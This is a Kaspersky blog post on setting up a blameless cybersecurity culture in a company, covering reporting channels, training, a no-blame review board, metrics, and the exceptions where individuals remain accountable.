Create channels for reporting issues. Offer several ways for employees to report problems: a dedicated section on the intranet, a specific email address, or the option to simply tell their immediate supervisor. Ideally, you should also have an anonymous hotline for reporting concerns without fear.
Train employees. Training helps employees recognize insecure processes and behaviors. Use real-world examples of problems they should report, and walk them through different incident scenarios. You can use our online Kaspersky Automated Security Awareness Platform to organize these cybersecurity-awareness training sessions. Motivate employees not only to report incidents, but also to suggest improvements and think about how to prevent security problems in their day-to-day work.
Educate your leadership. Every manager needs to understand how to respond to reports from their team. They need to know how and where to forward a report, and how to avoid creating blame-focused islands in a sea of just culture. Teach leaders to respond in a way that makes their coworkers feel supported and protected. Their reactions to incidents and error reports need to be constructive. Leaders should also encourage discussions of security issues in team meetings to normalize the topic.
Develop a fair review procedure for incidents and security-issue reports. You’ll need to assemble a diverse group of employees from various teams to form a “no-blame review board”. It will be responsible for promptly processing reports, making decisions, and creating action plans for each case.
Reward proactivity. Publicly praise and reward employees who report spearphishing attempts or newly discovered flaws in policies or configurations, or who simply complete awareness training better and faster than others on their team. Mention these proactive employees in regular IT and security communications such as newsletters.
Integrate findings into your security management processes. The conclusions and suggestions from the review board should be prioritized and incorporated into the company’s cyber-resilience plan. Some findings may simply influence risk assessments, while others could directly lead to changes in company policies, or implementation of new technical security controls or reconfiguration of existing ones.
Use mistakes as learning opportunities. Your security awareness program will be more effective if it uses real-life examples from your own organization. You don’t need to name specific individuals, but you can mention teams and systems, and describe attack scenarios.
Measure performance. To ensure this process is working and delivering results, you need to use information security metrics as well as HR and communications KPIs. Track the MTTR for identified issues, the percentage of issues discovered through employee reports, employee satisfaction levels, the number and nature of security issues identified, and the number of employees engaged in suggesting improvements.
Important exceptions
A security culture or blameless culture doesn’t mean that no one is ever held accountable. Aviation safety documents on non-punitive reporting, for example, include crucial exceptions. Protection doesn’t apply when someone knowingly and maliciously deviates from the regulations. This exception prevents an insider who has leaked data to competitors from enjoying complete impunity after confessing.
The second exception is when national or industry regulations require individual employees to be held personally accountable for incidents and violations. Even with this kind of regulation, it’s vital to maintain balance. The focus should remain on improving processes and preventing future incidents — not on finding who’s to blame. You can still build a culture of trust if investigations are objective and accountability is only applied where it’s truly necessary and justified.
How to implement a blameless approach to cybersecurity | Kaspersky official blog (posted by admin, 2025-08-11 13:06:41)